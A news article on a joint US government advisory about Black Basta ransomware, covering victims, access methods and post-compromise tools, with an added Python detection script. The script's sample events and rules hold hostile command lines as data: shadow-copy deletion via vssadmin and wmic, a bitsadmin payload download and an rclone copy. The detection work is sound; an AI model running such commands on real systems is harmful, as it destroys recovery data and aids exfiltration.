Black Basta Ransomware Hit Over 500 Organizations

The Black Basta ransomware group has hit more than 500 organizations globally, including critical infrastructure entities in North America, Europe, and Australia, the US government warns.

First identified in April 2022, Black Basta has been operating under the ransomware-as-a-service (RaaS) business model, where affiliates conduct cyberattacks, deploy malware against victim organizations, and collect a percentage of the ransom payment.

In a November 2023 report, blockchain analytics firm Elliptic estimated that Black Basta affiliates had received over $100 million in ransom payments from at least 90 victim organizations.

According to a new alert from CISA, the FBI, the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), Black Basta affiliates have conducted attacks against 12 out of 16 critical infrastructure sectors, including healthcare organizations.

For initial access, the cybercriminals rely on phishing and the exploitation of known vulnerabilities, such as CVE-2024-1709, a critical ConnectWise ScreenConnect flaw that started being exploited only days after it was publicly disclosed on February 19.

After compromising a victim’s network, the attackers deploy various tools for remote access, network scanning, lateral movement, privilege escalation, and data exfiltration, including SoftPerfect, BITSAdmin, PsExec, Mimikatz, and RClone.

The Black Basta affiliates were also observed exploiting vulnerabilities such as ZeroLogon, NoPac, and PrintNightmare for privilege escalation, abusing Remote Desktop Protocol (RDP) for lateral movement, and deploying the Backstab tool to disable endpoint detection and response (EDR) solutions.

After exfiltrating the victim’s data, the attackers delete volume shadow copies to hinder recovery, deploy ransomware to encrypt the compromised systems, and drop a ransom note.
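The post-compromise steps listed above (shadow copy deletion before encryption, RClone for exfiltration, BITSAdmin and PsExec for transfer and lateral movement) are the kind of activity a defender can look for in process-creation telemetry. The following is an added example written for this page, not code from the article or the advisory; the events, host names, rule names and patterns are constructed for illustration.

```python
import re

# Constructed sample of Windows process-creation events (Sysmon Event ID 1 style).
# These are made-up records, not telemetry from any real Black Basta incident.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "srv02", "image": r"C:\Tools\rclone.exe",
     "cmdline": "rclone.exe copy D:\\Share remote:bucket --transfers 8"},
    {"host": "ws01", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe readme.txt"},
    {"host": "srv03", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic shadowcopy delete"},
    {"host": "srv02", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download http://example.invalid/x.bin C:\\Temp\\x.bin"},
]

# Each rule pairs a TTP named in the advisory summary with a command-line pattern.
# Two patterns share the shadow_copy_deletion name because vssadmin and wmic
# are both common ways of removing restore points before encryption.
RULES = [
    ("shadow_copy_deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("shadow_copy_deletion", re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("rclone_exfil_tool", re.compile(r"\brclone(\.exe)?\b", re.I)),
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin(\.exe)?\s+/transfer", re.I)),
    ("psexec_lateral_movement", re.compile(r"\bpsexec(64)?(\.exe)?\b", re.I)),
]


def match_event(event):
    """Return the names of every rule whose pattern matches this event's command line."""
    return [name for name, pat in RULES if pat.search(event["cmdline"])]


def scan(events):
    """Return {rule_name: sorted list of hosts} for all events matching at least one rule."""
    hits = {}
    for ev in events:
        for name in match_event(ev):
            hits.setdefault(name, set()).add(ev["host"])
    return {name: sorted(hosts) for name, hosts in hits.items()}


if __name__ == "__main__":
    for rule, hosts in scan(SAMPLE_EVENTS).items():
        print(f"{rule}: {', '.join(hosts)}")
```

A single hit on shadow copy deletion is already a high-severity signal on its own; a host that also shows RClone or BITSAdmin activity in the same window matches the sequence the advisory describes and warrants immediate isolation.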

The new alert from CISA, FBI, HHS, and MS-ISAC provides details on the tactics, techniques, and procedures (TTPs) employed by Black Basta affiliates, indicators of compromise (IoCs), and recommended mitigations.

“Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions. The authoring organizations urge the HPH sector and all critical infrastructure organizations to apply the recommendations in the mitigations section to reduce the likelihood of compromise from Black Basta and other ransomware attacks,” the four government agencies note.

In January 2024, hacking research collective and consulting think tank SRLabs released a free decryptor to help Black Basta victims recover their data without paying a ransom.

Related: Free Decryptor Released for Black Basta Ransomware

Related: Black Basta Ransomware Linked to FIN7 Cybercrime Group

Related: New Black Basta Ransomware Possibly Linked to Conti Group
